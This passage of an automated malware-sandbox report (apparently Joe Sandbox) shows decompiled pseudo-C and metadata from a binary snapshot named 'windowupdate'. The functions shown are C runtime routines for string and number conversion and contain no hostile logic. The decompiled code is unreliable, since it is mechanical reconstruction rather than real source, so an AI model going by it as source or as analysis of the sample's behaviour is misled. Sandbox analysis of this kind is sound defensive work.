                      						_push("\nData: <");
                      						_push(_a12);
                      						_t30 =  *((intOrPtr*)(_t36 + 0xc)) - 0x24;
                      						__eflags = _t30;
                      						_push("\nAllocation number within this function: ");
                      						_push(_t30);
                      						_push("\nSize: ");
                      						_push(_t45);
                      						_push("\nAddress: 0x");
                      						E00D44240(_t30,  &_v324, 0xf4, "%s%s%p%s%zd%s%d%s%s%s%s%s", "Stack area around _alloca memory reserved by this function is corrupted");
                      						_t20 = E00DC1860(_t37, _t42, _v328, _t43, 4,  &_v324);
                      						_pop(_t44);
                      						goto L4;
                      					} else {
                      						return E00D47280(E00DC1860(__ecx, _t42, _t20, _t43, 4, "Stack area around _alloca memory reserved by this function is corrupted\n"), _t36, _v8 ^ _t46, _t42, _t43, __esi);
                      					}
                      				}
                      			}

                      APIs
                      • failwithmessage.LIBCMTD ref: 00DC161D
                        • Part of subcall function 00DC1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00DC18C1
                        • Part of subcall function 00DC1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 00DC18E0
                        • Part of subcall function 00DC1860: DebuggerProbe.LIBCMTD ref: 00DC18FA
                        • Part of subcall function 00DC1860: DebuggerRuntime.LIBCMTD ref: 00DC1916
                        • Part of subcall function 00DC1860: IsDebuggerPresent.KERNEL32 ref: 00DC193F
                      • _getMemBlockDataString.LIBCMTD ref: 00DC1649
                      • failwithmessage.LIBCMTD ref: 00DC16AD
                      Strings
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 00DC1614
                      • Address: 0x, xrefs: 00DC167A
                      • %s%s%p%s%zd%s%d%s%s%s%s%s, xrefs: 00DC1684
                      • Data: <, xrefs: 00DC1663
                      • Size: , xrefs: 00DC1674
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 00DC167F
                      • Allocation number within this function: , xrefs: 00DC166E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Debugger$ByteCharMultiWidefailwithmessage$BlockDataPresentProbeRuntimeString_get
                      • String ID: Address: 0x$Allocation number within this function: $Data: <$Size: $%s%s%p%s%zd%s%d%s%s%s%s%s$Stack area around _alloca memory reserved by this function is corrupted$Stack area around _alloca memory reserved by this function is corrupted
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00D95AF0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, char* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				char _v76;
                      				char _v80;
                      				char _v96;
                      				intOrPtr _t102;
                      				long _t106;
                      				void* _t111;
                      				void* _t125;
                      				void* _t142;
                      				void* _t145;
                      				intOrPtr _t167;
                      				void* _t179;
                      				void* _t180;
                      				void* _t181;
                      				void* _t182;
                      
                      				_t180 = __esi;
                      				_t179 = __edi;
                      				_t145 = __ebx;
                      				if(_a8 == 0 && _a12 > 0) {
                      					if(_a4 != 0) {
                      						 *_a4 = 0;
                      					}
                      					return 0;
                      				}
                      				__eflags = _a4;
                      				if(_a4 != 0) {
                      					_t146 = _a4;
                      					 *_a4 = 0xffffffff;
                      				}
                      				__eflags = _a12 - 0x7fffffff;
                      				if(_a12 > 0x7fffffff) {
                      					_v12 = 0;
                      				} else {
                      					_v12 = 1;
                      				}
                      				_v16 = _v12;
                      				__eflags = _v16;
                      				if(__eflags == 0) {
                      					_t142 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0, L"%ls", L"destination_count <= INT_MAX");
                      					_t181 = _t181 + 0x18;
                      					__eflags = _t142 - 1;
                      					if(_t142 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				__eflags = _v16;
                      				if(_v16 != 0) {
                      					L00D66CC0(_t145,  &_v96, _t180, _a20);
                      					_t167 =  *((intOrPtr*)(E00D67A60( &_v96)));
                      					__eflags =  *((intOrPtr*)(_t167 + 8)) - 0xfde9;
                      					if( *((intOrPtr*)(_t167 + 8)) != 0xfde9) {
                      						_t151 =  *((intOrPtr*)(E00D67A60( &_v96)));
                      						__eflags =  *((intOrPtr*)(_t151 + 0xbadc4d));
                      						if( *((intOrPtr*)(_t151 + 0xbadc4d)) != 0) {
                      							_v32 = 0;
                      							_t154 =  *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v96))) + 8));
                      							_t102 = E00DA0A90( *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v96))) + 8)), 0,  &_a16, 1, _a8, _a12, 0,  &_v32);
                      							_t182 = _t181 + 0x20;
                      							_v8 = _t102;
                      							__eflags = _v8;
                      							if(_v8 == 0) {
                      								L42:
                      								__eflags = _v8;
                      								if(_v8 != 0) {
                      									L55:
                      									 *((intOrPtr*)(L00D82F70(_t154))) = 0x2a;
                      									_v68 = 0x2a;
                      									E00D67230( &_v96);
                      									return _v68;
                      								}
                      								_t106 = GetLastError();
                      								__eflags = _t106 - 0x7a;
                      								if(_t106 != 0x7a) {
                      									goto L55;
                      								}
                      								__eflags = _a8;
                      								if(_a8 != 0) {
                      									__eflags = _a12;
                      									if(_a12 > 0) {
                      										E00D4AF80(_t179, _a8, 0, _a12);
                      										_t182 = _t182 + 0xc;
                      									}
                      								}
                      								_t154 = 0;
                      								__eflags = 0;
                      								if(0 == 0) {
                      									_v36 = 0;
                      								} else {
                      									_v36 = 1;
                      								}
                      								_v40 = _v36;
                      								__eflags = _v40;
                      								if(__eflags == 0) {
                      									_t111 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0, L"%ls", L"(\"Buffer too small\", 0)");
                      									_t182 = _t182 + 0x18;
                      									__eflags = _t111 - 1;
                      									if(_t111 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								__eflags = _v40;
                      								if(_v40 != 0) {
                      									goto L55;
                      								} else {
                      									 *((intOrPtr*)(L00D82F70(_t154))) = 0x22;
                      									E00D82900(L"(\"Buffer too small\", 0)", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x83, 0);
                      									_v64 = 0x22;
                      									E00D67230( &_v96);
                      									return _v64;
                      								}
                      							}
                      							__eflags = _v32;
                      							if(_v32 == 0) {
                      								__eflags = _a4;
                      								if(_a4 != 0) {
                      									 *_a4 = _v8;
                      								}
                      								_v72 = 0;
                      								E00D67230( &_v96);
                      								return _v72;
                      							}
                      							goto L42;
                      						}
                      						__eflags = (_a16 & 0x0000ffff) - 0xff;
                      						if((_a16 & 0x0000ffff) <= 0xff) {
                      							__eflags = _a8;
                      							if(_a8 == 0) {
                      								L37:
                      								__eflags = _a4;
                      								if(_a4 != 0) {
                      									 *_a4 = 1;
                      								}
                      								_v60 = 0;
                      								E00D67230( &_v96);
                      								return _v60;
                      							}
                      							__eflags = _a12;
                      							if(_a12 <= 0) {
                      								_v24 = 0;
                      							} else {
                      								_v24 = 1;
                      							}
                      							_v28 = _v24;
                      							__eflags = _v28;
                      							if(__eflags == 0) {
                      								_t125 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0, L"%ls", L"destination_count > 0");
                      								_t181 = _t181 + 0x18;
                      								__eflags = _t125 - 1;
                      								if(_t125 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v28;
                      							if(_v28 != 0) {
                      								 *_a8 = _a16;
                      								goto L37;
                      							} else {
                      								 *((intOrPtr*)(L00D82F70(_t151))) = 0x22;
                      								E00D82900(L"destination_count > 0", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x60, 0);
                      								_v56 = 0x22;
                      								E00D67230( &_v96);
                      								return _v56;
                      							}
                      						}
                      						__eflags = _a8;
                      						if(_a8 != 0) {
                      							__eflags = _a12;
                      							if(_a12 > 0) {
                      								_t151 = _a12;
                      								E00D4AF80(_t179, _a8, 0, _a12);
                      							}
                      						}
                      						 *((intOrPtr*)(L00D82F70(_t151))) = 0x2a;
                      						_v52 = 0x2a;
                      						E00D67230( &_v96);
                      						return _v52;
                      					}
                      					_v80 = 0;
                      					_v76 = 0;
                      					_t163 =  &_v80;
                      					_v20 = E00DA9E00(_a8, _a16 & 0x0000ffff,  &_v80);
                      					__eflags = _a4;
                      					if(_a4 != 0) {
                      						_t163 = _a4;
                      						 *_a4 = _v20;
                      					}
                      					__eflags = _v20 - 4;
                      					if(_v20 > 4) {
                      						_v48 =  *((intOrPtr*)(L00D82F70(_t163)));
                      						E00D67230( &_v96);
                      						return _v48;
                      					} else {
                      						_v44 = 0;
                      						E00D67230( &_v96);
                      						return _v44;
                      					}
                      				} else {
                      					 *((intOrPtr*)(L00D82F70(_t146))) = 0x16;
                      					E00D82900(L"destination_count <= INT_MAX", L"_wctomb_s_l", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0);
                      					return 0x16;
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$"$%ls$("Buffer too small", 0)$*$*$_wctomb_s_l$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00DAA060(void* __ecx, char* _a4, char _a8, char _a12, char _a16) {
                      				char _v5;
                      				char* _v12;
                      				char* _v16;
                      				char _v20;
                      				intOrPtr _v24;
                      				char _v28;
                      				char _v32;
                      				char _v36;
                      				char _v40;
                      				char _v44;
                      				char _v48;
                      				char _v52;
                      				void* _t82;
                      				char _t89;
                      				char _t91;
                      				void* _t99;
                      				void* _t103;
                      				void* _t107;
                      				void* _t111;
                      				void* _t112;
                      				char _t136;
                      				void* _t149;
                      
                      				_t112 = __ecx;
                      				if(_a4 == 0) {
                      					_v20 = 0;
                      				} else {
                      					_v20 = 1;
                      				}
                      				_v24 = _v20;
                      				_t157 = _v24;
                      				if(_v24 == 0) {
                      					_t111 = L00D84930(_t157, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0, L"%ls", L"buffer != nullptr");
                      					_t149 = _t149 + 0x18;
                      					if(_t111 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v24 != 0) {
                      					__eflags = _a8;
                      					if(_a8 <= 0) {
                      						_v28 = 0;
                      					} else {
                      						_v28 = 1;
                      					}
                      					_v32 = _v28;
                      					__eflags = _v32;
                      					if(__eflags == 0) {
                      						_t107 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0, L"%ls", L"buffer_count > 0");
                      						_t149 = _t149 + 0x18;
                      						__eflags = _t107 - 1;
                      						if(_t107 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					__eflags = _v32;
                      					if(_v32 != 0) {
                      						_t113 = 1;
                      						 *_a4 = 0;
                      						__eflags = _a12;
                      						if(_a12 <= 0) {
                      							_v36 = 0;
                      						} else {
                      							_t113 = _a12;
                      							_v36 = _a12;
                      						}
                      						__eflags = _a8 - _v36 + 1;
                      						if(_a8 <= _v36 + 1) {
                      							_v40 = 0;
                      						} else {
                      							_v40 = 1;
                      						}
                      						_v44 = _v40;
                      						__eflags = _v44;
                      						if(__eflags == 0) {
                      							_t103 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0, L"%ls", L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)");
                      							_t149 = _t149 + 0x18;
                      							__eflags = _t103 - 1;
                      							if(_t103 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v44;
                      						if(_v44 != 0) {
                      							__eflags = _a16;
                      							if(_a16 == 0) {
                      								_v48 = 0;
                      							} else {
                      								_v48 = 1;
                      							}
                      							_v52 = _v48;
                      							__eflags = _v52;
                      							if(__eflags == 0) {
                      								_t99 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0, L"%ls", L"pflt != nullptr");
                      								_t149 = _t149 + 0x18;
                      								__eflags = _t99 - 1;
                      								if(_t99 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v52;
                      							if(_v52 != 0) {
                      								_v12 = _a4;
                      								_v16 =  *((intOrPtr*)(_a16 + 8));
                      								 *_v12 = 0x30;
                      								_t136 = _v12 + 1;
                      								__eflags = _t136;
                      								_v12 = _t136;
                      								while(1) {
                      									__eflags = _a12;
                      									if(_a12 <= 0) {
                      										break;
                      									}
                      									__eflags =  *_v16;
                      									if( *_v16 == 0) {
                      										_v5 = 0x30;
                      									} else {
                      										_v5 =  *_v16;
                      										_v16 = _v16 + 1;
                      									}
                      									 *_v12 = _v5;
                      									_v12 = _v12 + 1;
                      									_a12 = _a12 - 1;
                      								}
                      								 *_v12 = 0;
                      								__eflags = _a12;
                      								if(_a12 < 0) {
                      									L47:
                      									__eflags =  *_a4 - 0x31;
                      									if( *_a4 != 0x31) {
                      										_t82 = E00D82E00(_a4 + 1);
                      										__eflags = _a4 + 1;
                      										E00D4B590(_a4, _a4 + 1, _t82 + 1);
                      									} else {
                      										 *((intOrPtr*)(_a16 + 4)) =  *((intOrPtr*)(_a16 + 4)) + 1;
                      									}
                      									__eflags = 0;
                      									return 0;
                      								}
                      								__eflags =  *_v16 - 0x35;
                      								if( *_v16 < 0x35) {
                      									goto L47;
                      								}
                      								_t89 = _v12 - 1;
                      								__eflags = _t89;
                      								_v12 = _t89;
                      								while(1) {
                      									__eflags =  *_v12 - 0x39;
                      									if( *_v12 != 0x39) {
                      										break;
                      									}
                      									 *_v12 = 0x30;
                      									_v12 = _v12 - 1;
                      								}
                      								_t91 =  *_v12 + 1;
                      								__eflags = _t91;
                      								 *_v12 = _t91;
                      								goto L47;
                      							} else {
                      								 *((intOrPtr*)(L00D82F70(_t113))) = 0x16;
                      								E00D82900(L"pflt != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x22, 0);
                      								return 0x16;
                      							}
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t113))) = 0x22;
                      							E00D82900(L"buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x21, 0);
                      							return 0x22;
                      						}
                      					} else {
                      						 *((intOrPtr*)(L00D82F70(_t112))) = 0x16;
                      						E00D82900(L"buffer_count > 0", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1e, 0);
                      						return 0x16;
                      					}
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t112))) = 0x16;
                      				E00D82900(L"buffer != nullptr", L"__acrt_fp_strflt_to_string", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\_fptostr.cpp", 0x1d, 0);
                      				return 0x16;
                      			}


























                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %ls$0$__acrt_fp_strflt_to_string$buffer != nullptr$buffer_count > 0$buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)$minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp$pflt != nullptr
                      • API String ID: 4218353326-3579526835
                      • Opcode ID: 27773409b682e459f22fc06f3308be86e2a0405b635f847ee1e1efaa76811ca1
                      • Instruction ID: 23d15c1651957ad71bebfd84545acc0d0f7731690cdba3fdc69abf7d4659100e
                      • Opcode Fuzzy Hash: 27773409b682e459f22fc06f3308be86e2a0405b635f847ee1e1efaa76811ca1
                      • Instruction Fuzzy Hash: EA916070E40349AFDF10EF98C855BAEBBB0FB56708F144659E4056B282C3B59984CBB6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E00D976D0(void* __ebx, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32) {
                      				signed int _v8;
                      				signed int _v12;
                      				char* _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				signed int _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				char _v68;
                      				intOrPtr _t124;
                      				signed int _t150;
                      				void* _t157;
                      				void* _t159;
                      				signed int _t174;
                      				signed int _t189;
                      				signed int _t201;
                      				signed int _t213;
                      				void* _t230;
                      				void* _t231;
                      
                      				_t230 = __esi;
                      				_t159 = __ebx;
                      				if(_a12 <= 0) {
                      					_v20 = 0;
                      				} else {
                      					_v20 = _a12;
                      				}
                      				_t161 = _v20 + 9;
                      				if(_a8 <= _v20 + 9) {
                      					_v24 = 0;
                      				} else {
                      					_v24 = 1;
                      				}
                      				_v28 = _v24;
                      				_t238 = _v28;
                      				if(_v28 == 0) {
                      					_t157 = L00D84930(_t238, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0, L"%ls", L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)");
                      					_t231 = _t231 + 0x18;
                      					if(_t157 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v28 != 0) {
                      					L00D66CC0(_t159,  &_v68, _t230, _a32);
                      					__eflags = _a28 & 0x000000ff;
                      					if((_a28 & 0x000000ff) != 0) {
                      						__eflags =  *_a24 - 0x2d;
                      						if( *_a24 != 0x2d) {
                      							_v32 = 0;
                      						} else {
                      							_v32 = 1;
                      						}
                      						_v48 = _a4 + _v32;
                      						__eflags = _a12;
                      						if(_a12 <= 0) {
                      							_v36 = 0;
                      						} else {
                      							_v36 = 1;
                      						}
                      						E00D97F10(_a4, _a8, _v48, _v36);
                      						_t231 = _t231 + 0x10;
                      					}
                      					_v8 = _a4;
                      					__eflags =  *_a24 - 0x2d;
                      					if( *_a24 == 0x2d) {
                      						 *_v8 = 0x2d;
                      						_t150 = _v8 + 1;
                      						__eflags = _t150;
                      						_v8 = _t150;
                      					}
                      					__eflags = _a12;
                      					if(_a12 > 0) {
                      						_t38 = _v8 + 1; // 0xe58b24c4
                      						 *_v8 =  *_t38;
                      						_t189 = _v8 + 1;
                      						__eflags = _t189;
                      						_v8 = _t189;
                      						 *_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v68))) + 0x88))))));
                      					}
                      					__eflags = _a28 & 0x000000ff;
                      					if((_a28 & 0x000000ff) == 0) {
                      						_v40 = 1;
                      					} else {
                      						_v40 = 0;
                      					}
                      					_v8 = _v8 + _a12 + _v40;
                      					__eflags = _a8 - 0xffffffff;
                      					if(_a8 != 0xffffffff) {
                      						_t201 = _a8 - _v8 - _a4;
                      						__eflags = _t201;
                      						_v44 = _t201;
                      					} else {
                      						_v44 = _a8;
                      					}
                      					E00D84A20(E00D82DE0(_v8, _v44, "e+000"), _t121, L"strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), \"e+000\")", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x9c, 0);
                      					_v16 = _v8 + 2;
                      					__eflags = _a16 & 0x000000ff;
                      					if((_a16 & 0x000000ff) != 0) {
                      						 *_v8 = 0x45;
                      					}
                      					_v8 = _v8 + 1;
                      					_t124 = _a24;
                      					__eflags =  *((char*)( *((intOrPtr*)(_t124 + 8)))) - 0x30;
                      					if( *((char*)( *((intOrPtr*)(_t124 + 8)))) != 0x30) {
                      						_t174 =  *((intOrPtr*)(_a24 + 4)) - 1;
                      						__eflags = _t174;
                      						_v12 = _t174;
                      						if(_t174 < 0) {
                      							_v12 =  ~_v12;
                      							 *_v8 = 0x2d;
                      						}
                      						_v8 = _v8 + 1;
                      						__eflags = _v12 - 0x64;
                      						if(_v12 >= 0x64) {
                      							asm("cdq");
                      							 *_v8 =  *_v8 + _v12 / 0x64;
                      							asm("cdq");
                      							_t86 = _v12 % 0x64;
                      							__eflags = _t86;
                      							_v12 = _t86;
                      						}
                      						_v8 = _v8 + 1;
                      						__eflags = _v12 - 0xa;
                      						if(_v12 >= 0xa) {
                      							asm("cdq");
                      							 *_v8 =  *_v8 + _v12 / 0xa;
                      							asm("cdq");
                      							_t102 = _v12 % 0xa;
                      							__eflags = _t102;
                      							_v12 = _t102;
                      						}
                      						_v8 = _v8 + 1;
                      						_t213 =  *_v8 + _v12;
                      						__eflags = _t213;
                      						 *_v8 = _t213;
                      					}
                      					__eflags = _a20 - 2;
                      					if(_a20 == 2) {
                      						__eflags =  *_v16 - 0x30;
                      						if( *_v16 == 0x30) {
                      							__eflags = _v16 + 1;
                      							E00D4B590(_v16, _v16 + 1, 3);
                      						}
                      					}
                      					_v52 = 0;
                      					E00D67230( &_v68);
                      					return _v52;
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t161))) = 0x22;
                      				E00D82900(L"result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)", L"fp_format_e_internal", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cvt.cpp", 0x79, 0);
                      				return 0x22;
                      			}



























                      APIs
                      • __aligned_msize.LIBCMTD ref: 00D97883
                      • __invoke_watson_if_error.LIBCMTD ref: 00D9788C
                      Strings
                      • result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 00D97714, 00D97756
                      • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 00D97722, 00D9774C, 00D97867
                      • d, xrefs: 00D978EB
                      • strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+, xrefs: 00D97871
                      • e+000, xrefs: 00D97876
                      • fp_format_e_internal, xrefs: 00D97751, 00D9786C
                      • %ls, xrefs: 00D97719
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == static_cast<size_t>(-1) ? result_buffer_count : result_buffer_count - (p - result_buffer), "e+
                      • API String ID: 4254006664-1740674501
                      • Opcode ID: fff64afa7d0ee19f287dcc18e4bd69d2ba0b1c6112d988214ba4b748c502a5ec
                      • Instruction ID: f239656d4b4e03164e8715d5331bb1bd9f53a994eb6613f6e4ff7c3b3dd8fcf0
                      • Opcode Fuzzy Hash: fff64afa7d0ee19f287dcc18e4bd69d2ba0b1c6112d988214ba4b748c502a5ec
                      • Instruction Fuzzy Hash: 5BA10874A14248EFCF04CF98C991BAEBBB1FF89304F248199E4556B381D775AE40DBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00DA5170(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
                      				char _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				int _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				int _v48;
                      				char _v52;
                      				char _v68;
                      				signed int _t61;
                      				void* _t64;
                      				intOrPtr _t88;
                      				void* _t123;
                      				void* _t125;
                      				void* _t126;
                      				void* _t127;
                      
                      				_t123 = __edi;
                      				L00D66CC0(__ebx,  &_v68, __esi, _a4);
                      				if(_a24 == 0) {
                      					_v16 =  *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v68))) + 8));
                      				} else {
                      					_v16 = _a24;
                      				}
                      				_v28 = _v16;
                      				if(_a28 == 0) {
                      					_v20 = 1;
                      				} else {
                      					_v20 = 9;
                      				}
                      				_t61 = E00DA0990(_v28, _v20, _a12, _a16, 0, 0);
                      				_t126 = _t125 + 0x18;
                      				_v12 = _t61;
                      				if(_v12 != 0) {
                      					_t64 = E00DA5110(_v12 << 1);
                      					_t127 = _t126 + 4;
                      					if(_t64 == 0) {
                      						_v24 = 0;
                      					} else {
                      						_t88 = E00DA5140(E00D89580(E00DA5110(_v12 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\getstringtypea.cpp", 0x51), 0xdddd);
                      						_t127 = _t127 + 0x1c;
                      						_v24 = _t88;
                      					}
                      					E00DA5090( &_v8,  *((intOrPtr*)(E00DA50B0( &_v52, _v24))));
                      					if(E00DA50F0( &_v8) != 0) {
                      						E00D4AF80(_t123, E00DA50F0( &_v8), 0, _v12 << 1);
                      						_v32 = E00DA0990(_v28, 1, _a12, _a16, E00DA50F0( &_v8), _v12);
                      						if(_v32 != 0) {
                      							_v48 = GetStringTypeW(_a8, E00DA50F0( &_v8), _v32, _a20);
                      							E00DA50D0( &_v8);
                      							E00D67230( &_v68);
                      							return _v48;
                      						}
                      						_v44 = 0;
                      						E00DA50D0( &_v8);
                      						E00D67230( &_v68);
                      						return _v44;
                      					} else {
                      						_v40 = 0;
                      						E00DA50D0( &_v8);
                      						E00D67230( &_v68);
                      						return _v40;
                      					}
                      				} else {
                      					_v36 = 0;
                      					E00D67230( &_v68);
                      					return _v36;
                      				}
                      			}
























                      APIs
                      • __wcstombs_l.LIBCMTD ref: 00DA5229
                      • __MarkAllocaS.LIBCMTD ref: 00DA5232
                        • Part of subcall function 00DA0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 00DA09C3
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA524D
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA5258
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA5273
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA52D7
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00DA52FE
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA530A
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00DA5213
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                      • API String ID: 2378836076-24854585
                      • Opcode ID: 546a2cdc6abbc5f5a50bbfece76affbe06e80441fe96f6282b7697e53c0fcee0
                      • Instruction ID: 1f6d402e651ba25b84c58700c2847aa11c0101f05929f6874a0817521bb89655
                      • Opcode Fuzzy Hash: 546a2cdc6abbc5f5a50bbfece76affbe06e80441fe96f6282b7697e53c0fcee0
                      • Instruction Fuzzy Hash: 3F5148B1910608EBDB04EFA4D892BEEB774FF55300F504158F502AB285EB34AE05CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D54380(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                      				char _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				char _v24;
                      				intOrPtr _v28;
                      				char _v32;
                      				char _v40;
                      				char _v48;
                      				void* _t43;
                      				intOrPtr* _t56;
                      				intOrPtr _t58;
                      				intOrPtr _t70;
                      				intOrPtr _t71;
                      
                      				E00D4F2A0( &_v16, _a8);
                      				_t56 =  *0xf20640; // 0x0
                      				_v8 =  *_t56;
                      				if(_v8 == 0) {
                      					E00D4FB00(__eflags, _a4, 1,  &_v16);
                      					return _a4;
                      				}
